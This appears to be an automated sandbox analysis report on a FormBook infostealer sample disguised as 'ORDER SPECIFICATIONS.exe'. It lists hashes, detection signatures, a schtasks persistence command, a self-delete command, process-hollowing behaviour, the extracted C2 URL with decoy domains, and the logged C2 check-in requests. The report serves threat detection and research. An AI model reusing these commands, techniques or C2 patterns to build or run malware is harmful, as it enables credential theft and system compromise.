
Analysis Report ORDER SPECIFICATIONS.exe

Overview

General Information

Sample Name: ORDER SPECIFICATIONS.exe
Analysis ID: 356492
MD5: e75a4df51162401b21c3eb79718fb3db
SHA1: 3328ead22db03ce461cb8bdb5d59638120e2444f
SHA256: 48709c3e07c128283d9d550331d6e5f7c4afeadfc61cad94d769ea8ce7399e77
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • ORDER SPECIFICATIONS.exe (PID: 6336 cmdline: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • schtasks.exe (PID: 6476 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ORDER SPECIFICATIONS.exe (PID: 6520 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
    • ORDER SPECIFICATIONS.exe (PID: 6552 cmdline: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe MD5: E75A4DF51162401B21C3EB79718FB3DB)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 5308 cmdline: /c del 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.athomecp.com/owws/"], "decoy": ["trolljoke.com", "contex3.info", "jabashir51.com", "brittand.com", "djaya.asia", "lab-wealth.com", "greyfriararabians.com", "oxfordhabits.com", "softwaresreports.info", "abjms.com", "winsteadarchitecture.com", "brucerolfsboulder.com", "unitytribune.com", "cyjulebu.com", "abaplants.com", "theexerciseforyou.com", "codigodebarrasser.com", "barbicanroadproductions.com", "sportenango.com", "hostsnc.com", "clubdonovoka.com", "adaptive.science", "meeplesisters.com", "shubhkari.com", "pooliswaiting.com", "sempat-ya8.com", "davispackphotography.com", "dezigo.design", "faxbbs.com", "lunarvac.com", "thewerideveloper.com", "ingenesinstitute.com", "elizabethfulco.com", "assemble-4u.com", "jingcilian.com", "rnpynsjw.net", "raphainfosec.com", "gdzas08.cloud", "murrpurrs.net", "hakua36tokyo.com", "rakennuskolibri.net", "renerossi.com", "raphaelyejesiel.com", "phoxinh.net", "amrshadhartanah21.com", "thehoneyglo.com", "xn--mariachilen-zeb.com", "excelfaq.online", "expandetusingresos.com", "cupsteam.com", "your-new-body-plan.com", "misskarenenglishreacher.com", "pulkitkumar.wtf", "tluxebeautyexperience.com", "sissysundays.com", "ketoburnerrevolution.com", "babdestaffing.com", "easywayplanet.com", "rewealth.club", "siamboss.com", "shamansmoke.com", "truervoice.com", "denisekohli.com", "gx17.net"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.ORDER SPECIFICATIONS.exe.2b26b2c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166a9:$sqlite3step: 68 34 1C 7B E1
  • 0x167bc:$sqlite3step: 68 34 1C 7B E1
  • 0x166d8:$sqlite3text: 68 38 2A 90 C5
  • 0x167fd:$sqlite3text: 68 38 2A 90 C5
  • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

System Summary:

Sigma detected: Scheduled temp file as task from temp location
Source: Process started, Author: Joe Security, Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe', ParentImage: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, ParentProcessId: 6336, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\LvZiFDk' /XML 'C:\Users\user\AppData\Local\Temp\tmpDA15.tmp', ProcessId: 6476

Signature Overview

AV Detection:

Found malware configuration
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, Malware Configuration Extractor: FormBook (same C2 and decoy configuration as listed under Malware Configuration above)
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe, ReversingLabs: Detection: 14%
Multi AV Scanner detection for submitted file
Source: ORDER SPECIFICATIONS.exe, Virustotal: Detection: 30%
Source: ORDER SPECIFICATIONS.exe, ReversingLabs: Detection: 14%
Yara detected FormBook
Source: Yara match, File source: 00000005.00000002.298238768.0000000001420000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.496481414.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.499636949.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.499736122.00000000053A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.298321628.0000000001450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.255037540.0000000003AF9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.ORDER SPECIFICATIONS.exe.3c2d0a0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.ORDER SPECIFICATIONS.exe.3c7ccc0.3.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\LvZiFDk.exe, Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ORDER SPECIFICATIONS.exe, Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.ORDER SPECIFICATIONS.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files
Source: ORDER SPECIFICATIONS.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: ORDER SPECIFICATIONS.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: chkdsk.pdbGCTL source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source: Binary string: chkdsk.pdb source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298384357.0000000001480000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: ORDER SPECIFICATIONS.exe, 00000005.00000002.298571038.00000000015BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.500281857.000000000563F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: ORDER SPECIFICATIONS.exe, chkdsk.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, Code function: 4x nop then jmp 0725D85Ch, 0_2_0725D6FF
Source: C:\Users\user\Desktop\ORDER SPECIFICATIONS.exe, Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h, 0_2_0725F2E8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49731 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49736 -> 34.90.54.238:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49737 -> 34.102.136.180:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.athomecp.com/owws/
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1 | Host: www.abaplants.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1 | Host: www.cyjulebu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1 | Host: www.denisekohli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1 | Host: www.hostsnc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1 | Host: www.assemble-4u.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1 | Host: www.raphaelyejesiel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1 | Host: www.your-new-body-plan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1 | Host: www.softwaresreports.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 34.102.136.180
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN
Source: Joe Sandbox View, ASN Name: GOOGLEUS
Source: Joe Sandbox View, ASN Name: UNIFIEDLAYER-AS-1US
HTTP GET or POST without a user agent
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=E2uPX13Kd8eziNpXwTixT+siYJwH/w0JmCiJBsiXejl5IKklxd2VA8+t7/1UF0B3bHAe&GzrX=Bxo0src HTTP/1.1 | Host: www.abaplants.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=LNtcZ4o3RSbiM3q1XP5+3qPXxFdWCQL8FVzehDhzTe1h59sjzavkswLHMrOSN2WRyLvP&GzrX=Bxo0src HTTP/1.1 | Host: www.cyjulebu.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=lwHO/uUGh/aXRG65LDVUqOi7qNbSmHJrcCZCAEgZXo9YpRM01PmoothBQXBavnYq4fuq&GzrX=Bxo0src HTTP/1.1 | Host: www.denisekohli.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=4P1MPend6t3dRr+zrFZAhnBbaZyC76urNt6lzZx4zgRAaIR2wDCeIn43mJ71sHhZDUem&GzrX=Bxo0src HTTP/1.1 | Host: www.hostsnc.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=tHbMDDeadmVNgKYcreuncRwf7boUCKl6MNzrWMM5Jrdb4IpAp8+CGbWYAVkD3n9oZQag&GzrX=Bxo0src HTTP/1.1 | Host: www.assemble-4u.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=Ng1hVjXym9Qjh/39zAZuuRZY5wWd2+1a+DNcin6p0h8GUL41G3Uc3DOSlbUNOeobFB2Q&GzrX=Bxo0src HTTP/1.1 | Host: www.raphaelyejesiel.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=wQPVVaqxY2IiVfQZkyRmW3q13fIzlgC5jJ34SIKwtgCZdzYlbOYBx3wkbgC3baC7Oc7O&GzrX=Bxo0src HTTP/1.1 | Host: www.your-new-body-plan.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src HTTP/1.1 | Host: www.softwaresreports.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: <a href="https://www.facebook.com/casarpontocom" target="_blank" title="Facebook/casarpontocom"> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: <a href="https://www.youtube.com/casarpontocom" target="_blank" title="Youtube/casarpontocom"> equals www.youtube.com (Youtube)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: <iframe src="//www.facebook.com/plugins/like.php?href=https%3A%2F%2Ffacebook.com%2FEventoCasar&width&layout=button_count&action=like&show_faces=false&share=false&height=21&appId=621352837957736" scrolling="no" frameborder="0" style="border:none; overflow:hidden; height:21px;" allowTransparency="true"></iframe> equals www.facebook.com (Facebook)
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: src="https://www.facebook.com/tr?id=912779795420526&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknown, DNS traffic detected: queries for: www.abaplants.com
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 23 Feb 2021 07:57:48 GMT | Content-Type: text/html | Content-Length: 1039 | Connection: close | Set-Cookie: security_session_verify=9ebc6a29fa9e7c317eed3150247f3800; expires=Fri, 26-Feb-21 15:57:48 GMT; path=/; HttpOnly | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Data Raw: (hex dump of the HTML response body omitted)
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.232661881.000000000121D000.00000004.00000001.sdmp, String found in binary or memory: http://en.wX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: chkdsk.exe, 00000010.00000002.501656216.0000000005BD2000.00000004.00000001.sdmp, String found in binary or memory: http://instagram.com/casarpontocom
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.261901918.0000000007260000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.microsoft.nh
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.254750109.0000000002AF1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comaYn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comoitu
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.253563451.00000000059E0000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comon
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comX
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.233155052.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.come
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234915943.00000000059E4000.00000004.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.234874416.0000000005A1D000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.235177312.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000002.257168928.0000000005AF0000.00000002.00000001.sdmp, ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.281490238.000000000BC30000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Micr
Source: ORDER SPECIFICATIONS.exe, 00000000.00000003.236733624.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/dn
